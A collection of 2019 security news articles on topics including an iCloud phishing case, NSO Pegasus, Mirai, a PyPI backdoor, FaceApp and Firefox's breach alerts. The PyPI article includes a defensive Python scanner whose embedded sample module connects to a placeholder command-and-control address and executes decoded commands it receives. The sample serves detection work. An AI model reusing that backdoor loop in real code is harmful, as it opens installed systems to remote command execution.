STE WILLIAMS

In the cooler for the next three years: Hacker of iCloud accounts used by athletes and rappers

A man from the US state of Georgia who pleaded guilty in March to breaking into the Apple iCloud accounts of sports and entertainment figures was sentenced on Thursday to three years and one month in federal prison – and ordered to pay almost $700,000 in restitution.

Kwamaine Jerell Ford was indicted in April 2018, at the age of 27, on six counts each of wire fraud, computer fraud, access device fraud, and aggravated identity theft. He pleaded guilty earlier this year to a single count of computer fraud and a single count of aggravated identity theft.

Ford faced charges for hacking into more than 100 Apple iCloud accounts of professional athletes and rappers using a phishing scheme.

‘More creative and more devious’

“In today’s high tech world, citizens entrust their personal information to a number of service providers and expect that information to be protected,” said Chris Hacker, the aptly named Special Agent in Charge of FBI Atlanta, in a statement. “Unfortunately, identity thieves are becoming more creative and more devious.”

Ford’s scheme, which ran from March 2015 to March 2018, was neither particularly creative nor devious, but it worked well enough. It involved duping victims into believing that he was an Apple support representative so they would hand over their iCloud account passwords and the answers to their security questions.

According to the indictment filed against him, Ford conducted his phishing attack using email addresses like [email protected] and [email protected] to fool people into thinking his messages had been sent from a legitimate Apple address.

Scam

USA.com is an insecure (HTTP) website that offers a search engine for local business information. The site, however, does not control email affiliated with the domain, which is administered by email service provider Mail.com, as USA.com notes on its scam warning page.

Though this warning pre-dates Ford’s scheme, the indictment against him makes clear that Ford’s victims failed to see anything wrong with messages from the USA.com domain.

“Using these spoof email accounts, Ford sent emails to victims containing misrepresentations about the status of their iCloud accounts, including false claims that the account had been locked or that a user was attempting to share a video file, and requested that the victims provide login credentials, including the account password or the answers to iForgot security questions,” the complaint states.

It notes that Ford also sometimes called victims on the phone pretending to be an Apple employee in order to obtain personal information.


Once he had obtained the login credentials of victims’ iCloud accounts, Ford would access them and reset the passwords so he would have sole control. Thereafter, he was able to use credit cards associated with the accounts to make purchases and transfer funds to other accounts under his control.

The court documents do not make clear whether the credit card numbers obtained were stored in files accessible through iCloud or were stored by Apple as an iCloud payment method. Nor do the documents, at least those available to the public, specify the names of the victims, characterized by US Attorney Byung Pak as “celebrities” involved in sports and music.

In any event, Ford used the stolen credit card numbers to spend $322,567 over a three-year period, on flights, car travel, hotels, retail goods, restaurants, and cash transfers to his online financial accounts, according to the US Attorney’s Office of the Northern District of Georgia.

In a similar case dating back to 2014 that involved computer abuse but not identity theft charges, four hackers broke into the iCloud accounts of celebrities and obtained nude pictures that they then posted on Reddit and 4chan, an incident referred to as Celebgate. Between 2016 and 2018, the four men involved – Ryan Collins, Edward Majerczyk, Emilio Herrera, and George Garofano – pleaded guilty and received sentences ranging from eight months to 18 months. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/hacker_icloud_jailed_thee_years/

Israel’s NSO Group: Our malware? Slurp your cloud backups plus phone data? They’ve misunderstood

Israeli spyware firm NSO Group has denied it developed malware that can steal user data from cloud services run by Amazon, Apple, Facebook, Google and Microsoft.

The Financial Times reported this morning that NSO’s Pegasus malware, which was previously known to be capable of slurping data from a phone handset, “has now evolved to capture the much greater trove of information stored beyond the phone, in the cloud, such as a full history of a target’s location data, archived messages or photo”.

This means it can access iCloud and Google Drive backups. It was suggested by the FT that linked cloud accounts accessed through apps on the target device are also vulnerable to this style of full-take surveillance, based on sales pitch documents shown, among other places, to the Ugandan government.

The Pink ‘Un reported that Pegasus is now capable of copying authentication tokens for services including Google Drive, Facebook Messenger and iCloud from an infected device, “allowing a separate server to impersonate the phone, including its location”. The NSO sales document boasted that this allowed spies operating the malware to bypass multi-factor authentication and the warning emails that a login from a new device would normally trigger.

Most concerningly, the firm allegedly claimed that its access remained persistent even when the malware was removed from the target device.

NSO Group was previously linked to the infamous “WhatsApp calls can pwn your mobe” exploit discovered and patched earlier this year. The iOS vulnerabilities Pegasus exploited were patched by Apple in 2016, with follow-up fixes for desktop Safari and OS X after it emerged that they affected those too. A year later, however, a coalition of Mexican and Canadian investigators uncovered sustained efforts by the Mexican government to use Pegasus to spy on local dissidents.

Mitigating this kind of attack ought to be a straightforward matter of resetting passwords and access tokens once the malware is cleansed from the infected device. Indeed, the FT mentions that this workaround was referenced in one of the pitch documents it had seen. The order matters, though: a password change alone does not necessarily invalidate tokens already issued to a cloned device, so the sessions and authorised devices on each cloud account need to be revoked explicitly, and the reset has to be done from a device known to be clean, or the new credentials are simply stolen again.

The Israeli company told The Reg: “There is a fundamental misunderstanding of NSO, its services and technology. NSO’s products do not provide the type of collection capabilities and access to cloud applications, services, or infrastructure, as listed and suggested in today’s FT article.

“Increasingly sophisticated terrorists and criminals are taking advantage of encrypted technologies to plan and conceal their crimes, leaving intelligence and law enforcement agencies in the dark and putting public safety and national security at risk. NSO’s lawful interception products are designed to confront this challenge.

“Our products are licensed in small scale to legitimate government intelligence and law enforcement agencies for the sole purpose of preventing or investigating serious crime including terrorism.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/nso_group_malware_cloud_report/

The Problem with Proprietary Testing: NSS Labs vs. CrowdStrike

Why apples-to-apples performance tests are the only way to accurately gauge the impact of network security products and solutions.

When a company is researching options for network security tools, it needs to be able to weigh a number of factors, including cost, effectiveness, compatibility, integration with current or third-party tools and platforms, and — perhaps most important — impact on network performance. To evaluate all options, however, there has to be some way to compare different solutions accurately. The recent legal conflict between CrowdStrike and NSS Labs illustrates why it is such a challenge for organizations to evaluate different vendors and products.

NSS Labs and CrowdStrike announced in late May that after two years, they had reached a confidential settlement to end their legal battle. CrowdStrike initially sued NSS Labs in February 2017 over negative test results that were published in an NSS Labs endpoint protection report. NSS Labs gave the CrowdStrike Falcon platform a “Caution” rating. CrowdStrike, however, maintained that the test was faulty. In late 2018, NSS Labs fought back with a lawsuit of its own against CrowdStrike, Symantec, ESET, and the Anti-Malware Testing Standards Organization (AMTSO), claiming that the vendors and AMTSO conspired to prevent NSS Labs from testing their products.

Following the settlement, NSS Labs retracted its 2017 assessment of CrowdStrike’s Falcon platform and issued a corrective statement, saying that “NSS’s testing of the CrowdStrike Falcon platform was incomplete and the product was not properly configured with prevention capabilities enabled. In addition to the results having already been acknowledged as partially incomplete, we now acknowledge they are not accurate and confirm that they do not meet our standards for publication.”

The CrowdStrike-NSS altercation is only one legal battle between a testing lab and a vendor. The NSS Labs lawsuit against Symantec, ESET, and AMTSO is still ongoing, even in the wake of the settlement with CrowdStrike, and it is likely that similar lawsuits are in the pipeline.

What’s Wrong with Network Security Testing
The situation involving NSS Labs and CrowdStrike is a perfect example of what’s wrong with network security testing. In a Dark Reading column earlier this year, I described network security testing as the Wild West, noting that proprietary testing methods conducted under uniquely optimized conditions create a chaotic scenario in which everyone plays by their own rules and customers are left struggling to sort it all out.

The fact that NSS Labs retracted its rating of CrowdStrike’s Falcon platform highlights one of the primary issues with closed or proprietary network security testing standards. Without visibility into the testing protocols and standards used, there is no way for organizations to objectively determine whether an NSS Labs assessment is right or wrong.

The flip side of the coin is that closed and proprietary testing standards also create the potential for vendors to game the system or gain an advantage over rival companies. Vendors frequently impose conditions on how their products can be tested and demand that testing labs design environments and tests that focus on areas in which the product excels, minimizing scenarios in which the product does not perform well.

In the end, however, whether the testing lab makes a mistake or misconfigures the product, or whether the vendor influences the testing unfairly to make its product look better, the result is that the testing can’t be trusted. And untrustworthy testing is useless when organizations are trying to compare various products to make a purchasing decision.

The Importance of Open Security Testing Standards
Testing labs don’t want to be in the position of trying to negotiate with vendors for the privilege of testing their products, nor do they want to cave to demands that make those products look better. Vendors don’t want to have their products tested in scenarios that don’t pit them against rivals on an even playing field. Customers don’t want test results that can’t be trusted, or assessments with questionable accuracy that can’t be verified because the testing methodology is proprietary. The answer is to adopt open network security testing standards.

NetSecOPEN (like AMTSO, a vendor-led organization) was formed in 2017 to address issues and challenges related to the current proprietary testing environment. We believe that the network and security industries must go beyond simply validating test results and, instead, establish new tests that are open, transparent, and created through a cooperative, collaborative effort. Ultimately, apples-to-apples performance tests that accurately portray the effectiveness and impact of network security products on network performance are essential, and the result of such testing is a win-win-win for testing labs, vendors, and — most of all — customers.


Brian Monkman is executive director of NetSecOPEN, a nonprofit, membership-driven organization with a goal of developing open standards for testing network security products. A 25-year network security veteran, he has extensive experience in technical support, sales …

Article source: https://www.darkreading.com/risk/the-problem-with-proprietary-testing-nss-labs-vs-crowdstrike/a/d-id/1335259?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Mirai Groups Target Business IoT Devices

More than 30% of Mirai attacks, and an increasing number of variants of the malware, are going after enterprise IoT devices, raising the stakes for business.

The groups behind Mirai and variants of the Internet of Things (IoT) device infector are increasingly targeting businesses, with nearly one-third of attacks in recent months focusing on devices commonly used inside companies, IBM’s X-Force security research group says.

Companies have encountered about twice as many attacks by variants of Mirai in 2019 versus 2018, with more than 63 device-infecting programs seen to date this year, according to IBM X-Force. Specifically, three new Mirai variants — Gafgyt, Shaolin, and Loli — target enterprise devices to drop denial-of-service or cryptomining software on the compromised systems. 

“If your organization is using IoT devices, or if you’re unsure of its use of IoT devices, you should be concerned,” says Charles DeBeck, senior cyberthreat intelligence analyst at IBM. “Threat actors are actively targeting this space and developing malware for it, which indicates not only a capability to target IoT, but also that targeting it would be profitable. This means IoT malware isn’t going away anytime soon.”

The move to attack business infrastructure is a natural evolution for the bad guys. While enterprise systems tend to be better protected, they also are connected to the Internet via higher bandwidth connections, making them more valuable to cybercriminals once compromised.

In March, Palo Alto Networks described a new version of Mirai malware that included 11 new exploits, of a total of 27, targeting WePresent presentation systems and LG Supersign TVs that are sold to businesses. 

“[T]argeting enterprise vulnerabilities allows [attackers] access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks,” wrote Palo Alto’s Ruchna Nigam, a senior security researcher, in an alert on the attack.

Mirai is malware, first discovered in 2016, that infects devices not traditionally targeted by malware, such as home routers, digital video recorders, and other IoT products. The compromised devices have historically been used in massive distributed denial-of-service (DDoS) attacks that threaten businesses. Initial attacks against DNS provider Dyn and security journalist and researcher Brian Krebs used about 150,000 devices and generated more than 500 Gbps of traffic, according to Level 3 Communications.

“These new attacks are alarming for their scope, impact, and the ease with which attackers employed them,” stated Dale Drew, then chief security officer of Internet provider Level 3 Communications, in prepared testimony during a hearing before two subcommittees of the US House of Representatives just two months after Mirai first appeared. “Also worrisome is that these attackers relied on just a fraction of the total available compromised IoT nodes in order to attack their victims, demonstrating the potential for significantly greater havoc from these new threats.”

Consumer devices will likely continue to be targeted because they are common and relatively insecure. In 2018, IBM saw a monthly average of 3,000 attempts to attack its customers with Mirai or Mirai-like malware. In 2019, that rate has roughly doubled. 

In addition, IBM found attackers appear to be focusing on both the insurance and information services industries, accounting for more than 80% of attacks. While these industries could be seeing more attacks because they have a larger IoT footprint compared with other industries, that seems an unlikely explanation, IBM’s DeBeck says.

“In our experience, increased levels of incidents generally indicate increased targeting, whether this targeting is intentional or unintentional,” he says. “It is unlikely the trend of increased incidents is due to greater use of IoT technology in these sectors, as these fields have no particular affinity for IoT usage.”

IoT devices tend to proliferate quickly inside companies’ environments and are a common shadow IT problem, DeBeck says. Companies need to get a handle on just how widespread the devices are, he says.

“The first step any organization needs to take is to inventory what IoT devices are in their network. Without full visibility, you can’t protect anything,” he says.

Every device should have someone responsible for managing it, including patching it regularly, monitoring it for unusual activity, and securing the device’s interaction with other enterprise IT.


Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …

Article source: https://www.darkreading.com/mirai-groups-target-business-iot-devices/d/d-id/1335308?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Europol Head Fears 5G Will Give Criminals an Edge

Catherine De Bolle is concerned law enforcement will lose its ability to track criminals with the arrival of 5G networks.

The evolution of 5G networks is causing concern for Catherine De Bolle, head of Europol, who argues that law enforcement will lose the ability to surveil criminals when 4G networks become obsolete. EU member states lack both regulations and technology to keep up, she says.

The ability to monitor criminals “is one of the most important investigative tools that police officers and services have, so we need this in the future,” she explained in an interview with Reuters, pointing to the example of a child being kidnapped.

European law enforcement officials can currently monitor and listen to criminals using mobile 4G devices, but their tools cannot be used on 5G networks, De Bolle said. In her opinion, European law enforcement agencies should have been involved in discussions with tech firms and policymakers earlier in the transition to 5G. Now, police agencies are researching ways to minimize the damage when they lack the ability to do their jobs as usual.

“The biggest risk is that we are not enough aware of the developments on a technological level and we have to be ahead on this,” De Bolle said. “We have to understand what is going on and we have to try to provide answers to it.”

She suggested Europol evolve as a platform for modernizing EU law enforcement by developing new tools and technology — a move that would require far more political and financial support than it is planned to have for the 2021–2027 budget period.


Article source: https://www.darkreading.com/threat-intelligence/europol-head-fears-5g-will-give-criminals-an-edge/d/d-id/1335309?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Malware in PyPI Code Shows Supply Chain Risks

A code backdoor in a package on the Python Package Index demonstrates the importance of verifying code brought in from code repositories.

The pace of modern software development requires code reuse, and effective code reuse requires code repositories. These collections of code fragments, functions, libraries, and modules allow developers to write applications without having to reinvent every small (or large) detail in their code. That makes repositories very valuable to developers – and very rich targets for malicious actors.

Researchers at ReversingLabs have discovered the most recent attack against a repository: a module that carries a backdoor found in popular Python repository Python Package Index (also known as PyPI or Cheese Shop). This isn’t the first time PyPI has been attacked, but this one is notable because it involves malicious code thought to have been previously fixed.

“Essentially, a backdoor that has been reported before but hasn’t been cleaned completely from the repository was still available and live on the Web page,” says Robert Perica, principal engineer at ReversingLabs. And while the package involved is not ubiquitous, it is being used. “What’s troubling about this package is that even though it’s not a popular package, it averages 82 installs per month,” Perica says.

The malware resides in a module named “libpeshnx,” which is similar to an earlier module named “libpeshna” and was contributed by the same author. According to ReversingLabs’ blog post on the discovery, the actual backdoor mechanism is very simple, involving a call to a command-and-control server followed by a wait to be activated.

A Supply Chain Attack
Recent years have seen an increase in the number of attacks launched against companies’ supply chains. Most of these involve physical supply chains, but Perica says security professionals need to understand these code repositories – from PyPI to RubyGems, NuGet, and npm – are critical pieces of their software supply chain. That understanding should lead to strong security procedures around code drawn from the repositories.

“Many of these software repositories don’t have such a thorough review process during user submissions,” Perica says. “Essentially, any user can more or less submit anything.”

He contrasts this with open source projects hosted on GitHub, where there is typically a review and approval process for new code added to the official release. Still, PyPI is trusted within the Python developer community. “PyPI is like the official package repository for the Python Software Foundation,” Perica notes.

He points out that PyPI hosts more than 188,000 projects, with almost 1.4 million releases and roughly 350,000 users. PyPI is almost certain to be the repository used by beginning developers, Perica adds, whether they’re working on individual projects or software for an employer.

Worst-Case Scenario
Writing secure code is complicated by the fact that modules depend on other modules. These “dependencies,” the network of functions and modules pulled together for a single library, can be many layers deep, so a backdoor does not have to be in the package a developer chose; it can sit in anything that package transitively imports. Perica says the best solution for companies looking to minimize the risk from code repositories is to have a security team look at each library to be used and verify the contents.

It takes a lot of effort, he says, but that effort can still be dramatically less than that required to recover from a major software vulnerability that has been exploited.
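One way to do the per-library verification Perica recommends, as an added example rather than ReversingLabs’ own tooling: a small static triage pass in Python that parses a package’s modules and flags the shape of backdoor described above, a network call made at import time followed by decoding and executing whatever comes back. The sample module it scans is constructed for this example and is not the libpeshnx code; the call lists, the `Finding` record and the `verdict` rules are this example’s own assumptions about what is worth a human’s attention.

```python
"""Static triage of a package module for 'call home, then wait' backdoor indicators.

Added example; not ReversingLabs' tooling. Walks the AST and flags network,
payload-decoding and dynamic-execution calls, noting whether each executes on
import (module top level) or only inside a function or class body.
"""
import ast
from dataclasses import dataclass
from typing import Dict, List

# Callees worth a look. Lists are this example's assumption, not an exhaustive set.
NETWORK_CALLS = {
    "socket.socket", "socket.create_connection", "urllib.request.urlopen",
    "requests.get", "requests.post", "http.client.HTTPConnection",
}
DECODE_CALLS = {"base64.b64decode", "codecs.decode", "zlib.decompress", "marshal.loads"}
EXEC_CALLS = {"exec", "eval", "compile", "os.system", "os.popen",
              "subprocess.Popen", "subprocess.call", "subprocess.run"}


@dataclass(frozen=True)
class Finding:
    kind: str        # "network", "decode" or "exec"
    call: str        # fully qualified callee, e.g. "socket.socket"
    lineno: int
    at_import: bool  # True when the call runs on import (module top level)


class _Scanner(ast.NodeVisitor):
    def __init__(self) -> None:
        self.aliases: Dict[str, str] = {}   # local name -> qualified name
        self.findings: List[Finding] = []
        self.depth = 0                       # >0 while inside def/class bodies

    def visit_Import(self, node: ast.Import) -> None:
        for a in node.names:
            if a.asname:
                self.aliases[a.asname] = a.name
            else:
                root = a.name.split(".")[0]
                self.aliases[root] = root

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module:  # relative imports resolve inside the package; skip them
            for a in node.names:
                self.aliases[a.asname or a.name] = f"{node.module}.{a.name}"

    def _qualify(self, func: ast.expr) -> str:
        """Resolve a Name/Attribute chain to a dotted name via the imports seen."""
        parts = []
        while isinstance(func, ast.Attribute):
            parts.append(func.attr)
            func = func.value
        if not isinstance(func, ast.Name):
            return ""
        parts.append(self.aliases.get(func.id, func.id))
        return ".".join(reversed(parts))

    def visit_FunctionDef(self, node: ast.AST) -> None:
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    visit_AsyncFunctionDef = visit_ClassDef = visit_FunctionDef

    def visit_Call(self, node: ast.Call) -> None:
        name = self._qualify(node.func)
        for kind, table in (("network", NETWORK_CALLS),
                            ("decode", DECODE_CALLS), ("exec", EXEC_CALLS)):
            if name in table:
                self.findings.append(Finding(kind, name, node.lineno, self.depth == 0))
        self.generic_visit(node)


def scan_source(source: str) -> List[Finding]:
    scanner = _Scanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


def verdict(findings: List[Finding]) -> str:
    """'suspicious': beacons out at import time and decodes/executes what it gets.
    'review': sensitive calls present, but only inside functions. Else 'clean'."""
    kinds_at_import = {f.kind for f in findings if f.at_import}
    if "network" in kinds_at_import and kinds_at_import & {"decode", "exec"}:
        return "suspicious"
    return "review" if findings else "clean"


# Constructed sample of the pattern described in the article: connect to a
# command-and-control host on import, then sit in a loop waiting for orders.
# 203.0.113.10 is a TEST-NET-3 documentation address, not a real C2.
SAMPLE_MODULE = '''
import base64, socket, time
from subprocess import Popen

def helper(x):
    return x + 1

_c2 = "203.0.113.10"
_s = socket.socket()
_s.connect((_c2, 4444))
while True:
    cmd = base64.b64decode(_s.recv(1024))
    if cmd:
        exec(cmd)
    time.sleep(30)
'''

if __name__ == "__main__":
    found = scan_source(SAMPLE_MODULE)
    for f in found:
        print(f"line {f.lineno:>3}  {f.kind:<8} {f.call:<20} at_import={f.at_import}")
    print("verdict:", verdict(found))
```

Run it over every `.py` in an unpacked sdist or wheel (including `setup.py`, which executes at install time) before the package is allowed into a build, and pair it with hash-pinned requirements (`pip install --require-hashes`) so that an artifact that has been reviewed cannot later be swapped for a different release under the same name. It is a triage filter, not a verdict: a “review” still needs a human to read the flagged function.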


Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/application-security/malware-in-pypi-code-shows-supply-chain-risks/d/d-id/1335310?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

FaceApp privacy panic sets internet alight

If you’ve been anywhere near Facebook this week, you’ve probably seen selfies of friends next to AI-generated images of what they’ll look like in a few decades. Underneath those posts, you’ll see comments from others warning them they’ve just signed over their soul to an obscure Russian company. That’s right, it’s time for another internet bogeyman. This week, its name is FaceApp.

Launched in 2017, FaceApp (which isn’t associated with Facebook) is an iOS and Android app from Russian company Wireless Lab. It lets you upload a selfie and then manipulates it for you, changing your facial expression, age, and even your gender. It’s very convincing (judging from those pictures on Facebook).

Although the app has offered an aging filter since shortly after its launch, it went viral this week after someone noticed that the company was claiming sweeping rights over the photos it processed. The terms and conditions are pretty draconian:

You grant FaceApp a perpetual, irrevocable, nonexclusive, royalty-free, worldwide, fully-paid, transferable sub-licensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, publicly perform and display your User Content and any name, username or likeness provided in connection with your User Content in all media formats and channels now known or later developed, without compensation to you. When you post or otherwise share User Content on or through our Services, you understand that your User Content and any associated information (such as your username, location or profile photo) will be visible to the public.

The ‘irrevocable’ part had the internet all aflutter, and even invited Congressional scrutiny. Senator Chuck Schumer wrote to the chair of the Federal Trade Commission on Wednesday fretting about the app.

He said:

FaceApp’s location in Russia raises questions regarding how and when the company provides access to the data of US citizens to third parties, including potentially foreign governments.

Many other press reports and social media posts also raised fears about the app for the same two reasons: irrevocability, and Russia. Responding to TechCrunch, though, Wireless Lab said that FaceApp only uploads photos selected by the users for editing, and may store them in the cloud because that’s where it does its processing. It usually deletes images from its servers within 48 hours, it added. Also, it said it doesn’t send user data to Russia, but processes images on US cloud providers’ infrastructure.

An app that denies you any rights in its terms and conditions should set your alarm bells ringing. But other services’ terms, while not so aggressive, are still concerning.

For example, although Facebook says you own your content, the company can use your picture, along with data about other actions you take on Facebook, with any ads or sponsored content. The company can share your image with third parties, including unspecified service providers that support Facebook. You can end your agreement with Facebook by deleting your image, it says, although it may continue to appear if you have shared it with others and they have not deleted it.

Or check out the privacy policy of AccuWeather, the company that lost users after researchers found it sending location data. Its policy lets it gather information about other devices nearby, and its terms also let it harvest your device ID and information from wearable devices, such as your pulse and body temperature. Your pulse and body temperature… for a weather app?

People may worry about Wireless Lab using your image for its own purposes, but as we’ve covered before, others in the West, including YouTube and IBM have already done that. An anti-privacy contract should concern you, but what’s worrying is how few people take the time to read the terms and conditions of well-known apps, no matter what country they come from.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/jyKSsHibDMY/

Shapeshifting Morpheus chip aims to baffle hackers

Researchers at the University of Michigan call it ‘Morpheus’ and it aims to make hacking so difficult at microprocessor level that attackers will give up long before they get the chance to do any damage.

It’s the sort of pitch that will strike most people as pretty sensational, which is why the engineers behind the project are disinclined to call it ‘unhackable’ even as some journalists have written about it in such exaggerated terms.

Backed by the famous US Defense Advanced Research Projects Agency (DARPA), Morpheus is a new processor architecture that sets out to counter properties of today’s microprocessors which, the researchers argue, make whole classes of vulnerability and exploit impossible to defend against in software alone.

Today’s attacks typically rely on malware that abuses ordinary program behaviour, such as permissions and code injection, or that drives a program into an unexpected state, for example a memory buffer overrun used to hijack execution (a ‘control-flow’ attack) or to leak information.

That makes them look like a pure software problem, which is how the industry treats them: vulnerabilities are found and patched, in effect rewriting the code so that the error state can no longer occur.

It’s a never-ending job because new code keeps getting added, which adds new vulnerabilities, requiring new patches.

Less commented upon is that such attacks also rely on the microprocessor managing its on-chip and system memory in a predictable way, so that an exploit can count on where code and data will be and how they will be represented.

It is this layer that Morpheus sets out to change, by encrypting and randomising, or ‘churning’, how data is laid out in memory every 50ms – faster than an attacker can locate and use it – in effect making many common vulnerabilities impossible to exploit reliably.

The University of Michigan’s Todd Austin often explains this to journalists using the analogy of a Rubik’s Cube:

Imagine trying to solve a Rubik’s Cube that rearranges itself every time you blink. That’s what hackers are up against with Morpheus. It makes the computer an unsolvable puzzle.

Another way of understanding it is that it’s a lower-level and more powerful version of current techniques such as Address Space Layout Randomisation (ASLR).

This ‘moving target’ defence wouldn’t make computers unhackable – Morpheus doesn’t address every type of attack – but it would at least greatly reduce the attack surface.

Side channel

The clever part is that using a Morpheus-based microprocessor would not require developers to do anything because the protections work at the hardware level.

Inevitably, there are some downsides – primarily that the extra resource management hits performance and requires physically redesigned and possibly larger microprocessors.

Nevertheless, Morpheus’s significance could be that it influences a new generation of microprocessor designs, having impressed in the researchers’ tests against a subset of real-world control-flow attacks.

Morpheus also has wider potential, note the researchers:

Beyond control-flow attacks, we envision that a similar approach could be adopted to protect against side-channel attacks, timing attacks, Rowhammer attacks, and even cache attacks.

Indeed, with side-channel attacks on microprocessors themselves suddenly a major worry, that might be the capability that makes big chip makers embrace Morpheus with open arms.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/_syFEr6YYcQ/

Firefox to pile on more native privacy features

Mozilla is expanding the privacy tools built into Firefox by integrating its Lockwise password manager directly into the browser and expanding its support for the Have I Been Pwned (HIBP) website.

Lockwise is an app for iOS and Android, and an add-on for the desktop version of Firefox. It’s a password manager designed to offer more seamless support for synchronising passwords across the three environments.

Firefox had password storage before, but Lockwise lets desktop users manage and edit their passwords and replicates the same interface across mobile devices. In Firefox 70, Mozilla will now integrate Lockwise directly into the browser.

Mozilla is also enhancing its front end to HIBP, a site operated by Australian security researcher Troy Hunt that indexes credentials exposed in data breaches. It lets people look up an email address and see which breaches it appeared in, and separately check whether a password has turned up in a breach.
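As an added illustration, not Mozilla’s or HIBP’s code, here is a small Python client for the k-anonymity lookup that HIBP’s Pwned Passwords service uses for the password side of that search: the client hashes the password with SHA-1, sends only the first five hex characters of the hash, receives every known suffix under that prefix with a breach count, and does the match locally, so the service never learns the password or even its full hash. The fake server, its corpus, the breach counts and the example sites and usernames are constructed for this example; the real endpoint is an HTTPS GET of https://api.pwnedpasswords.com/range/{prefix} returning CRLF-separated SUFFIX:COUNT lines.

```python
import hashlib

PREFIX_LEN = 5   # the client reveals only the first 5 hex chars of the SHA-1


def sha1_hex_upper(password: str) -> str:
    """Pwned Passwords keys on the upper-case hex SHA-1 of the UTF-8 password."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


class FakePwnedPasswordsServer:
    """Offline stand-in for GET https://api.pwnedpasswords.com/range/{prefix}.

    Built from a small, constructed corpus of password -> breach count;
    the real service indexes hundreds of millions of hashes.  The server
    only ever sees the 5-character prefix, which it records in
    `queries_seen` so the caller can check what was disclosed.
    """

    def __init__(self, corpus: dict):
        self._by_prefix: dict = {}
        for password, count in corpus.items():
            digest = sha1_hex_upper(password)
            self._by_prefix.setdefault(digest[:PREFIX_LEN], []).append(
                f"{digest[PREFIX_LEN:]}:{count}"
            )
        self.queries_seen: list = []

    def range(self, prefix: str) -> str:
        """Return the 'SUFFIX:COUNT' lines (CRLF-separated) for one prefix."""
        prefix = prefix.upper()
        if len(prefix) != PREFIX_LEN or any(c not in "0123456789ABCDEF" for c in prefix):
            raise ValueError("prefix must be 5 hex characters")
        self.queries_seen.append(prefix)
        return "\r\n".join(sorted(self._by_prefix.get(prefix, [])))


def parse_range_response(body: str) -> dict:
    """Parse a range response into {suffix: count}, tolerating blank lines."""
    counts: dict = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password: str, fetch_range) -> int:
    """Breach count for `password` via the k-anonymity range lookup.

    fetch_range(prefix) returns the response body; a real client would do an
    HTTPS GET of /range/{prefix} here.  The suffix comparison stays local.
    """
    digest = sha1_hex_upper(password)
    prefix, suffix = digest[:PREFIX_LEN], digest[PREFIX_LEN:]
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


def breached_logins(logins, fetch_range) -> list:
    """Flag saved logins whose password is in the corpus.

    logins: iterable of (site, username, password); returns (site, username, count)
    for each hit, which is the kind of list a password-manager breach warning shows.
    """
    hits = []
    for site, user, password in logins:
        count = pwned_count(password, fetch_range)
        if count > 0:
            hits.append((site, user, count))
    return hits


if __name__ == "__main__":
    # Constructed corpus and counts; the real corpus is far larger.
    server = FakePwnedPasswordsServer({"password": 3861493, "letmein": 12345})
    saved = [("example.com", "alice", "letmein"), ("example.org", "bob", "zG7#qLm!9vPx2wTe")]
    print(breached_logins(saved, server.range))   # [('example.com', 'alice', 12345)]
    print(server.queries_seen)                    # five-character prefixes only
```

Two things to check in a real client: send the prefix upper-case exactly as hashed, and treat an empty body as "no matches" rather than an error, since a prefix with no known suffixes legitimately returns nothing.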

Mozilla first supported Hunt’s site in September 2018 when it launched Firefox Monitor. This website was little more than an HIBP shell designed to draw more people to the service using the Mozilla name. Mozilla called it a minimum viable product and said that it would continue to improve it.

True to its word, in November 2018 it expanded the service to support multiple languages. It also added a notification in Firefox 67 that alerts desktop users when they visit a site with a recently reported data breach, and it updated Firefox Monitor with a dashboard so that people can monitor multiple email addresses.

Firefox 70 extends the in-browser Firefox Monitor notification to saved logins. Users can open about:logins to see whether any saved login belongs to a site that has reported a breach since that login was last updated.

Mozilla originally launched Firefox as a simple, fast browser, and it is gradually adding features. Still, these are designed to protect your privacy, and if you trust Mozilla they may be a safer bet than third-party add-ons, some of which behave deceptively.

The danger of relying on third-party sites like HIBP is that ownership may change. Hunt has announced that he wants to sell the website, citing the insane amount of work it takes to operate it. However, he has vowed to maintain the integrity of HIBP and ensure that consumers can still search freely on it, regardless of who buys it.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/q-NknoPxSgU/

Excluding Huawei from UK’s 5G will harm security, MPs warn

Excluding Huawei from the UK’s 5G network infrastructure would harm resilience and “lower security standards”, the Intelligence and Security Committee (ISC) warned today.

It also called for Britain’s next prime minister, which most think will be uncombable hair syndrome sufferer Boris Johnson, to help make a decision on the matter of the Chinese kitmaker’s inclusion so that UK networks can all move on with their plans.

“The extent of the delay is now causing serious damage to our international relationships: a decision must be made as a matter of urgency,” said the committee.

The committee released its statement on the status of 5G suppliers ahead of the government’s delayed Telecoms Supply Chain Review, which will determine whether Huawei’s gear can be included in the UK’s network infrastructure.

The supply chain review was supposed to be published “by spring 2019” and has since been put on ice until the end of August, weeks and in some cases months after the initial rollouts of 5G NSA (non-standalone) kit by some of the UK’s networks.

Vendor consolidation in the telecoms market means just a few major players remain: Nokia, Ericsson and Huawei, ISC noted.

Limiting the field to just two, on the basis of the above arguments, would increase over-dependence and reduce competition, resulting in less resilience and lower security standards. Therefore including a third company – even if you may have some security concerns about them and will have to set a higher bar for security measures within the system – will, counterintuitively, result in higher overall security.

